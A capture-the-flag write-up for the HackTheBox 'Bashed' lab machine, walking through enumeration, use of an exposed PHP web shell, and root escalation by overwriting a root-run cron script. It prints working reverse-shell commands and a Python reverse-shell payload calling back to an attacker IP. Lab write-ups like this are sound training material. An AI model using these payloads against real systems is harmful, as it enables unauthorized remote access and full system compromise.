HackTheBox Bashed Writeup

Explore the fundamentals of cybersecurity in the Bashed Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.10.68 bashed.htb

Script to add hosts automatically#

ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV bashed.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery#

Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

==> DIRECTORY: http://bashed.htb/css/                                                                        
==> DIRECTORY: http://bashed.htb/dev/                                                                        
==> DIRECTORY: http://bashed.htb/fonts/                                                                       
==> DIRECTORY: http://bashed.htb/images/                                                                           
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/     

Getting a Shell:#

1. Discover the PHP Bash Web Shell#

• On the website http://bashed.htb/single.html, you’ll find a link to the PHP Bash web shell source code on GitHub:
  • https://github.com/Arrexel/phpbash
• Access the live PHP Bash web shell on the server:
  • http://bashed.htb/dev/phpbash.php

2. Retrieve the User Flag#

• Once inside the PHP Bash web shell, retrieve the arrexel user flag:

cat /home/arrexel/user.txt

3. Check Sudo Privileges#

• After gaining access, check the sudo privileges for the current user:

sudo -l

• The output reveals:

(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for scriptmanager#

• Locate directories accessible by the scriptmanager user by running:

find / -type d -readable -user scriptmanager | grep -v '^/proc\|^/run\|^/sys'

This command lists readable directories for scriptmanager, excluding system directories like /proc, /run, and /sys.

5. Set Up a Reverse Shell Listener#

• On your attacking machine, set up a listener to catch the reverse shell:

nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox#

• Since the available nc (netcat) version on the target system is netcat-openbsd, which lacks the -e option, you can use BusyBox to achieve a reverse shell. On the target machine, execute:

busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Monitor Processes with pspy#

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download pspy#

• On your attacking machine, download the appropriate pspy binary (e.g., pspy64 for 64-bit systems) from the official repository:
  • https://github.com/DominicBreuker/pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer pspy to the Target Server Using Python HTTP Server#

• On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:

python3 -m http.server 8080

• On the target machine, download pspy64 using wget:

wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run pspy to Monitor Processes#

• Now that pspy64 is on the target machine, run it to monitor running processes:

/tmp/pspy64

• While monitoring, pspy may show processes that are periodically executed by root. For example:

2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py

• This shows that test.py is executed by root, which could be exploited by modifying the script.

1. Switch to scriptmanager User#

• test.py is owned by scriptmanager, switch to scriptmanager:

sudo -u scriptmanager bash

2. Edit test.py#

• Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:

nano /scripts/test.py

• Replace the contents of test.py with the following reverse shell code:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

import socket, os, pty
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")

3. Set up a Listener#

• On your local machine (the attacker machine), set up a listener to capture the reverse shell:

nc -lvnp 9002

4. Wait for Execution#

• The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access#

• Once the reverse shell connects, you should have a shell as root. You can verify this by checking the user and reading sensitive files:

cat /root/root.txt